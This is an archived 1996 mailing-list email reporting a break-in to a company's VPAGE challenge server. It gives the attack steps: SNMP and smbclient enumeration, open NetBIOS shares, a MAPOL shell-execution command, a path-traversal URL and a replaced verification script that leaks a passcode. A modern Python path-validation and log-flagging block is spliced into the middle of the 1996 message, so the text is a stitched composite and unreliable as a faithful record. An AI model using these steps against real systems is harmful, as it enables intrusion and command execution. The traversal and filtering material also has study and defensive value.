From proff  Thu Jul  4 12:05:59 1996
Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id MAA14970 for best-of-security; Thu, 4 Jul 1996 12:05:59 +1000
Received: from applejack.CS.YALE.EDU (APPLEJACK.CS.YALE.EDU [128.36.0.131]) by suburbia.net (8.7.4/Proff-950810) with ESMTP id LAA14416 for <proff@suburbia.net>; Thu, 4 Jul 1996 11:57:54 +1000
Received: from eli.CS.YALE.EDU by applejack.CS.YALE.EDU (8.7.1/res.host.cf-4.0)
	with ESMTP id UAA11539; Wed, 3 Jul 1996 20:20:34 -0400 (EDT) sender Postmaster@CS.YALE.EDU for <sneakers-outgoing@applejack.cs.yale.edu>
Received: by eli.CS.YALE.EDU id UAA17536; Wed, 3 Jul 1996 20:16:50 -0400 (EDT) sender owner-sneakers@CS.YALE.EDU for sneakers-outgoing
Received: from bulldog.CS.YALE.EDU by eli.CS.YALE.EDU (8.7.1/res.host.bitnet.cf-4.1)
	with ESMTP id UAA17478; Wed, 3 Jul 1996 20:13:13 -0400 (EDT) sender owner-sneakers@CS.YALE.EDU for <sneakers-eli@eli.cs.yale.edu>
Received: from access.mbnet.mb.ca by bulldog.CS.YALE.EDU (8.7.1/res.host.uucp.cf-4.1)
	with SMTP id UAA12217; Wed, 3 Jul 1996 20:12:45 -0400 (EDT) sender iceman@access.mbnet.mb.ca for <sneakers@CS.YALE.EDU>
Received: by access.mbnet.mb.ca id AA04109
  (5.67b/IDA-1.4.4 for sneakers@CS.YALE.EDU); Wed, 3 Jul 1996 19:12:38 -0500
Date: Wed, 3 Jul 1996 19:12:37 -0500 (CDT)
From: Oliver Friedrichs <iceman@MBnet.MB.CA>
To: sneakers@CS.YALE.EDU
Subject: World Star Holdings Inc. challenge
Message-Id: <Pine.SUN.3.91.960703185559.1679A-100000@access.mbnet.mb.ca>
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: proff
Precedence: bulk


VPAGE
~~~~~

The product which is being developed by World Star Holdings Inc. is known
as VPAGE.  VPAGE is essentially a package designed to allow dynamic
creation of web pages when a user selects a link on their server.
Before delivering the web page to the user, security checks are done to
ensure that the user is an authorized user.

To support this dynamic delivery of web pages, an interpretive language
known as MAPOL was developed.  For each page, instead of having regular
html documents, there are scripts which generate the page, after
performing security checks.  These scripts have an .mpl extension.

The breakin
~~~~~~~~~~~

The hostname of the challenge server (205.200.247.10) was obtained via
snmp.  The hostname obtained was ZEUS.

Using samba, it was easy to obtain a listing of filesystems which were
being exported (now that we knew the hostname).

# ./smbclient -L ZEUS -I 205.200.247.10

Initially on June 13, the following directories were directly mountable
on host 205.200.247.10.  The complete contents of these directories were
accessible and easily modified by any user on the internet.  (Not actual
samba output, rather a DIR command).

DOORCO~1     <DIR>     06-11-96   3:56p
HTML         <DIR>     06-13-96   4:04a
INI          <DIR>     06-13-96   3:04p
SCRIPTS      <DIR>     06-13-96   9:08a
SECURE       <DIR>     06-13-96   3:05p

These directories were accessible via the netbios service, which offered
unrestricted, unpassworded access to the system directories.

Somewhere during the day of June 13, access was lost to the scripts and
ini directories; however, it remained for the html directory, which
contained the html pages offered by the server.

Windows NT does not easily allow any interaction with the operating
system without having the system operator install a daemon to support
this interaction.  The dynamic design of VPAGE and the MAPOL scripting
language made it possible to execute any Windows NT shell command
and obtain the output.

The MAPOL language has an option to execute a shell command with the
following syntax:

PRINT SHELL("COMMAND.COM /C DIR /S C:\")

By simply placing a .mpl script onto the server, it was possible to
cause VPAGE to execute this script.  VPAGE only looks in the scripts
directory; however, it was easily possible to force VPAGE to execute
our own script in any other directory via:

http://205.200.247.10/vpage3.exe?..\html\script.mpl
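The check the script loader described above was missing, as an added example (not VPAGE code; the scripts root path and the sample log lines are assumed and constructed). It confines a requested script name to the scripts directory, also covering slash and percent-encoded variants of the traversal, and shows how the same check flags offending requests in a log review:

```python
import posixpath
from urllib.parse import unquote

# Hypothetical scripts root; the report does not give the real path.
SCRIPTS_DIR = "/inetsrv/scripts"


def resolve_script(query, scripts_dir=SCRIPTS_DIR):
    """Return the path of the .mpl script named by the query string, or
    None if the request would land outside scripts_dir.  Decodes twice
    (double encoding), treats backslash and slash alike as NT does,
    normalizes '.' and '..', then checks the result is still inside."""
    name = unquote(unquote(query)).replace("\\", "/")
    if "\x00" in name:                    # embedded NUL would truncate a C string
        return None
    if name.startswith("/") or (len(name) > 1 and name[1] == ":"):
        return None                       # absolute, UNC or drive-letter path
    root = posixpath.normpath(scripts_dir)
    candidate = posixpath.normpath(posixpath.join(root, name))
    if not candidate.startswith(root + "/"):
        return None                       # '..' walked out of the scripts tree
    if not candidate.lower().endswith(".mpl"):
        return None                       # only MAPOL scripts may be run
    return candidate


def flag_requests(log_lines):
    """Return the vpage3.exe queries in the given log lines that
    resolve_script rejects: what a review of HTTP_LOG should surface."""
    marker = "vpage3.exe?"
    flagged = []
    for line in log_lines:
        idx = line.find(marker)
        if idx < 0:
            continue
        query = line[idx + len(marker):].split(" ", 1)[0]
        if resolve_script(query) is None:
            flagged.append(query)
    return flagged


# Constructed sample requests, modelled on the one quoted in the report.
SAMPLE_LOG = [
    "GET /vpage3.exe?verify.mpl HTTP/1.0",
    "GET /vpage3.exe?..\\html\\script.mpl HTTP/1.0",
    "GET /vpage3.exe?%2e%2e/html/script.mpl HTTP/1.0",
]

if __name__ == "__main__":
    print(flag_requests(SAMPLE_LOG))
```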

When originally entering the challenge site via the initial web page,
one is presented with a locked bank vault which requires an "account
number" to pass through.

The 101 digit account number to pass through the bank vault door was
obtained by replacing a script called 'verify.mpl' which was originally
used to compare the code entered by the user, with the passcode on the
server.  The verify.mpl script was modified to print out the passcode,
and to succeed even if it was incorrect.

At the bank teller window, one was presented with the following text:

'You have 10(ten) tries to break into an account in a 24 hour period.
 You must then wait 24 hours before you are eligible to try again.'

The code obtained was:

dkl14234rf3ew344idfr3j23qrfwojowqjoijo3481379491281
klj318912jo3j981oij3198u3k9ualsdjlkj289u492yaright

After entering the code correctly, one was presented with a web page
with the following text:

'CONGRATULATIONS!!!

Please present the following statement to Ameritel....
342423421237678679didn'tthinkyouwouldmakeittohere'

No list of product codes and prizes was easily available - perhaps
hidden on another server and not referenced by this server.  Any
information stored on or passed through this server can be compromised
in this case; even if it were stored in encrypted form, it would still
have to be decrypted at some point.

Within a day of contacting World Star Holdings Inc. this page was
changed, and then stated:

'CONGRATULATIONS!!! You've made it through the entrance door!
   This establishes that you've got what it takes to take the
   CyberTest'96 Challenge.
   Good Luck!'

(Which it will still state now when the 101 digit code is entered)

No, the VPAGE software itself was not breached (however we have analyzed
the software, and have come up with possible entry points).
The entry points were weaknesses in their system setup - ones which
anyone could have exploited with minimal knowledge of networking.

I hereby certify that the above description is true, and that there are
many reliable witnesses who can account for these events.  A complete
directory tree is available which contains a listing of all files
(including operating system) which were present on the system at the
time of the breach.  The actual breach occurred from 00:01 A.M.
June 14 until 5:00 A.M. June 14.

Following is a listing of the root C:\ directory on the challenge
server:

 Volume in drive C has no label
 Volume Serial Number is 9C3B-5A58

Directory of C:\

AMERITEL     <DIR>     06-14-96   4:01a
ARJ      EXE    104614 01-19-92  11:51p
AUTOEXEC BAT        42 06-11-96   9:17a
COMMAND  COM     92870 07-11-95   9:50a
CONFIG   SYS        19 06-11-96   9:16a
EMM386   EXE    125495 07-11-95   9:50a
FTP          <DIR>     06-11-96   3:03p
FTP_LOG      <DIR>     06-11-96   3:03p
HAL      DLL     48416 05-26-95   4:57a
HIMEM    SYS     32935 07-11-95   9:50a
HTTP_LOG     <DIR>     06-12-96  12:15a
I386         <DIR>     06-11-96   9:24a
INI_FI~1     <DIR>     06-11-96   4:58p
MOUSE    COM     56408 03-10-93   6:00a
MOUSE    INI        53 12-21-94  12:06a
PAGEFILE SYS  45088768 06-12-96   1:50p
SMARTDRV EXE     45145 08-22-95   9:39a
TEMP         <DIR>     06-13-96   1:36p
USERS        <DIR>     06-11-96   1:20p
WIN32APP     <DIR>     06-11-96   1:20p
WINNT35      <DIR>     06-12-96   1:50p
       21 file(s)   45594765 bytes

10-15 people were present when the correct account number was entered
and the congratulations page was displayed.  All web pages were
printed out at the time they were displayed.

I have been told that this completes 1/5th of the challenge.

I have been offered $500 by World Star Holdings Inc.; however, I have
not as of yet received payment.

Oliver Friedrichs

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Oliver Friedrichs <iceman@MBnet.MB.CA>         MBnet System Administrator   
       "UNIX doesn't have bugs, it just develops random features" 

